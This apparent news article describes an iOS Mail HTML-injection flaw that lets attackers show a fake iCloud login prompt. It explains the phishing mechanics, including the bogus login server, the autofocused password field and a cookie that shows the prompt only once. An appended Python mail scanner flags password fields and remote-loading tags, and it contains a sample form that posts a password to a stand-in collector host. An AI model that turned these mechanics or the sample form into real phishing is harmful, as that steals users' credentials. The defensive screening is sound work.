Apple users can easily be tricked into sharing their iCloud credentials because of a bug in Apple's default iOS Mail application, warns security researcher Jan Soucek.

The researcher reported the flaw to Apple back in January 2015, but the company has not patched it as of now. Jan Soucek has now published proof-of-concept code in order to push Apple into fixing the bug.

It is almost hilarious that the vulnerability is caused by one simple fact: Apple's Mail app does not ignore HTML tags in email messages.

On GitHub, where he hosts his PoC iOS inject kit, Soucek explained: “This bug allows remote HTML content to be loaded, replacing the content of the original e-mail message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password “collector” using simple HTML and CSS.”

The researcher also published a video demonstrating the attack on an iPad and an iPhone.

Put simply, a successful attack needs two things: an email containing the aforementioned HTML tag, sent to the target, and a server hosting a bogus login page. The bogus pop-up login prompt looks legitimate enough to trick the targeted user into filling in their credentials.

Autofocus is enabled for the password field, so as soon as the target clicks “OK”, the dialogue field is hidden. The victim's email address can also be shown in the username field by simply modifying the code.

The code uses cookies to tell whether the victim has already visited the bogus page, which lets the attacker show the pop-up only once and prevents the prompt from appearing a second time. That makes it all look really genuine!

It all looks natural because Apple's operating systems tend to prompt for logins at random times, and Apple users know that very well. Hence, the prompt does not raise any suspicion in the user's mind at first.

As Apple has not patched the vulnerability, the only way users can protect themselves is to not enter their credentials when prompted while an email is open in the Mail app. In the meantime, we can all hope that Apple delivers a patch soon to resolve the problem for good!
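
On the receiving side, an administrator can also screen inbound mail for the markup a password "collector" like this depends on. The following is an added example, not Soucek's PoC or any Apple code: it parses the HTML parts of a message and flags password fields, autofocus and remote-loading elements. The tag list, finding names, quarantine rule and sample messages are assumptions constructed for illustration.

```python
from email import message_from_string
from html.parser import HTMLParser

# Assumed list of remote-loading elements; the article does not name the tag involved.
REMOTE_TAGS = {"iframe", "frame", "object", "embed"}

class MailHtmlAudit(HTMLParser):
    """Records markup that an ordinary e-mail body has no need for."""
    def __init__(self):
        super().__init__()
        self.findings = set()

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # tag and attribute names arrive lower-cased
        if tag in REMOTE_TAGS or (tag == "meta" and "http-equiv" in a):
            self.findings.add("remote-load:" + tag)
        elif tag == "form":
            self.findings.add("form")
        elif tag == "input":
            if a.get("type", "").lower() == "password":
                self.findings.add("password-field")
            if "autofocus" in a:
                self.findings.add("autofocus")

def audit_message(raw):
    """Return sorted findings over every text/html part of a raw message."""
    findings = set()
    for part in message_from_string(raw).walk():
        if part.get_content_type() == "text/html":
            body = part.get_payload(decode=True) or b""
            parser = MailHtmlAudit()
            parser.feed(body.decode(part.get_content_charset() or "utf-8", "replace"))
            findings |= parser.findings
    return sorted(findings)

def verdict(findings):
    """Quarantine mail that asks for a password or loads remote markup."""
    risky = any(f == "password-field" or f.startswith("remote-load:") for f in findings)
    return "quarantine" if risky else "deliver"

# Constructed sample messages (not taken from the PoC).
SUSPICIOUS = ("From: a@example.com\nSubject: Sign in\nContent-Type: text/html\n\n"
              '<form action="https://collector.example/"><input type="password" autofocus></form>')
BENIGN = ("From: b@example.com\nSubject: News\nContent-Type: text/html\n\n"
          '<p>Hello, see <a href="https://example.com/">our site</a>.</p>')

if __name__ == "__main__":
    for raw in (SUSPICIOUS, BENIGN):
        print(verdict(audit_message(raw)), audit_message(raw))
```

A legitimate message has no reason to carry a password input, so a hit on that finding alone is a strong signal regardless of how the form reached the mail client.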
